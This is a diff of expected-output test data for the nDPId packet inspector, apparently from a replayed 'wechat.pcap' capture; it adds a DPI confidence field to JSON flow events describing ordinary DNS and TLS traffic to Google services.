 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1492167338426,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"ts_msec":1492167338426,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1492167339426,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492167339426,"pkt":"AQBeAAD7eJKcD6iOCABFAABEuN1AAAERHcHAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1492167339427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"ts_msec":1492167339427,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342857,"flow_last_seen":1492167342857,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1492167342857,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1492167342857,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"ts_msec":1492167342857,"pkt":"8IQvSpdgeJKcD6iOCABFAABQ0QRAAEAR5OLAqAFnwKgB\/tHmADUAPEQCPBkBAAABAAAAAAAADHNhZmVicm93c2luZxFnb29nbGV1c2VyY29udGVudANjb20AAAEAAQ=="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342857,"flow_last_seen":1492167342857,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1492167342857,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342857,"flow_last_seen":1492167342857,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1492167342857,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1492167342893,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"ts_msec":1492167342893,"pkt":"eJKcD6iO8IQvSpdgCABFoAECAABAAEARtJXAqAH+wKgBZwA10eYA7qtlPBmBgAABAAIABAAEDHNhZmVicm93c2luZxFnb29nbGV1c2VyY29udGVudANjb20AAAEAAcAMAAUAAQAANssADgJzYgFsBmdvb2dsZcArwEAAAQABAAAAxwAErNkWDsBDAAIAAQAACYwABgNuczHARcBDAAIAAQAACYwABgNuczTARcBDAAIAAQAACYwABgNuczLARcBDAAIAAQAACYwABgNuczPARcBqAAEAAQABNLQABNjvIArAjgABAAEAATS0AATY7yIKwKAAAQABAAE0tAAE2O8kCsB8AAEAAQABNLQABNjvJgo="}
-00774{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.14"}}
+00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.14"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342893,"flow_last_seen":1492167342893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1492167342893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167342893,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8j4ZAAEAGJj\/AqAFnrNkWDpcBAbvnsj+XAAAAAKACchDgsAAAAgQFtAQCCAoAMLARAAAAAAEDAwc="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1492167342941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167342941,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8xIIAADIGPqOs2RYOwKgBZwG7lwHnJuhS57I\/mKASpajHRwAAAgQFZAQCCApd2bi8ADCwEQEDAwc="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1492167342941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167342941,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0j4dAAEAGJkbAqAFnrNkWDpcBAbvnsj+Y5yboU4AQAOWaewAAAQEICgAwsB1d2bi8"}
-00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167342893,"flow_last_seen":1492167342942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1492167342942,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167342893,"flow_last_seen":1492167342995,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1492167342995,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1"}}
-01982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167342893,"flow_last_seen":1492167342997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4434,"flow_avg_l4_payload_len":443,"midstream":0,"ts_msec":1492167342997,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","server_names":"*.googleusercontent.com,*.apps.googleusercontent.com,*.appspot.com.storage.googleapis.com,*.blogspot.com,*.bp.blogspot.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.doubleclickusercontent.com,*.ggpht.com,*.googledrive.com,*.googlesyndication.com,*.googleweblight.com,*.safenup.googleusercontent.com,*.sandbox.googleusercontent.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.googleapis.com,*.storage.select.googleapis.com,blogspot.com,bp.blogspot.com,commondatastorage.googleapis.com,doubleclickusercontent.com,ggpht.com,googledrive.com,googleusercontent.com,googleweblight.com,static.panoramio.com.storage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.googleusercontent.com","alpn":"h2,http\/1.1","fingerprint":"8B:36:AF:31:A2:4C:EE:50:CC:6F:34:F7:2C:A3:C5:B6:4B:02:AC:53"}}
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167342893,"flow_last_seen":1492167342942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1492167342942,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167342893,"flow_last_seen":1492167342995,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1492167342995,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1"}}
+02008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167342893,"flow_last_seen":1492167342997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4434,"flow_avg_l4_payload_len":443,"midstream":0,"ts_msec":1492167342997,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","server_names":"*.googleusercontent.com,*.apps.googleusercontent.com,*.appspot.com.storage.googleapis.com,*.blogspot.com,*.bp.blogspot.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.doubleclickusercontent.com,*.ggpht.com,*.googledrive.com,*.googlesyndication.com,*.googleweblight.com,*.safenup.googleusercontent.com,*.sandbox.googleusercontent.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.googleapis.com,*.storage.select.googleapis.com,blogspot.com,bp.blogspot.com,commondatastorage.googleapis.com,doubleclickusercontent.com,ggpht.com,googledrive.com,googleusercontent.com,googleweblight.com,static.panoramio.com.storage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.googleusercontent.com","alpn":"h2,http\/1.1","fingerprint":"8B:36:AF:31:A2:4C:EE:50:CC:6F:34:F7:2C:A3:C5:B6:4B:02:AC:53"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167345896,"flow_last_seen":1492167345896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167345896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1492167345896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167345896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0u5hAAEAGF5PAqAFn2DrNTroLAbv4cm+uICz91YAQATUbzAAAAQEICgAwswD2qQZf"}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167345896,"flow_last_seen":1492167345896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167345896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -33,22 +33,22 @@
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492167347435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167347435,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0LFtAACwG\/EnLzZeiwKgBZwG700RsJQ5CFiW5B4ARAQCiIgAAAQEICkXRnm4AMKsW"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350333,"flow_last_seen":1492167350333,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1492167350333,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1492167350333,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1492167350333,"pkt":"8IQvSpdgeJKcD6iOCABFAAA92D9AAEAR3brAqAFnwKgB\/rP+ADUAKS5MZgIBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQAAAQAB"}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350333,"flow_last_seen":1492167350333,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1492167350333,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350333,"flow_last_seen":1492167350333,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1492167350333,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1492167350372,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"ts_msec":1492167350372,"pkt":"eJKcD6iO8IQvSpdgCABFoADcAABAAEARtLvAqAH+wKgBZwA1s\/4AyDQ0ZgKBgAABAAEABAAEA3NzbAdnc3RhdGljA2NvbQAAAQABwAwAAQABAAAAHQAErNkXQ8AQAAIAAQACiyoADQNuczEGZ29vZ2xlwBjAEAACAAEAAosqAAYDbnMywEHAEAACAAEAAosqAAYDbnM0wEHAEAACAAEAAosqAAYDbnMzwEHAPQABAAEABThHAATY7yAKwFYAAQABAAUudQAE2O8iCsB6AAEAAQAFLnUABNjvJArAaAABAAEABS51AATY7yYK"}
-00754{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1492167350372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.67"}}
+00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1492167350372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.67"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350385,"flow_last_seen":1492167350385,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1492167350385,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02236{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1492167350385,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1492167350385,"pkt":"8IQvSpdgeJKcD6iOCABFAAVivyhAAEAR8DbAqAFnrNkXQ8kzAbsFThBpDTHWY7YNkySLUTAzNQEAZRP82mbzhTNOuyagAQAEQ0hMTx0AAABQQUQAIgEAAFNOSQAxAQAAU1RLAGsBAABWRVIAbwEAAENDUwB\/AQAATk9OQ58BAABNU1BDowEAAEFFQUSnAQAAVUFJRMgBAABTQ0lE2AEAAFRDSUTcAQAAUERNROABAABTUkJG5AEAAFNNSEzoAQAASUNTTOwBAABDVElN9AEAAE5PTlAUAgAAUFVCUzQCAABNSURTOAIAAFNDTFM8AgAAS0VYU0ACAABYTENUSAIAAENTQ1RIAgAAQ09QVEgCAABDQ1JUYAIAAElSVFRkAgAAQ0VUVggDAABDRkNXDAMAAFNGQ1cQAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1zc2wuZ3N0YXRpYy5jb23DJ9pgKUoswhKlaAfLoi3sQZPhfUFgtpep51u0rkbBgx\/nebVFToqDPqkbsFtGn3MXCPqLWhc6j\/ixUTAzNQHogWCSkhrofu2AhqIVgpFY8Kq2MDAwMDAwMDC6zWefDMewsHm6e\/MeaJgBlt0fDWQAAABDQzIwQ2hyb21lLzU3LjAuMjk4Ny4xMzMgTGludXggeDg2XzY0Jc6XFWD7G7yXYXhVaoxdywAAAABYNTA5AAAQAAEAAAAeAAAAtqrwWAAAAAA5eOlJA3D70ONW2AJf\/ogbdqDz00OrZf\/OgXQcK6rvrAta8o74ustrYp5ItVHeFC1VJKErdNkin676crWgBJJhZAAAAAEAAABDMjU1wgnkHLidnM3CCeQcuJ2czT2t9HxBefiRQAt7kKmuees3ygAAW65hsjHRUCwmcSnHJYniTszHhABKgaojbj7US89crmIZu34dDjUIs9wDqj3f87VRLZoVe0zMx1t+ZFc1SOwYij5LWSM1YcolsQBx9V4iuTevcGsCo1kr3VNCHdz7PtfP9d6GZNrg2+YgXWbXAAnfNe23tKnBUPczWdseoa1PkV+7toc2QUBJDmQV3Doscx5oizBP3jmujZdyIIvaDPKntnnsjC8AAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAA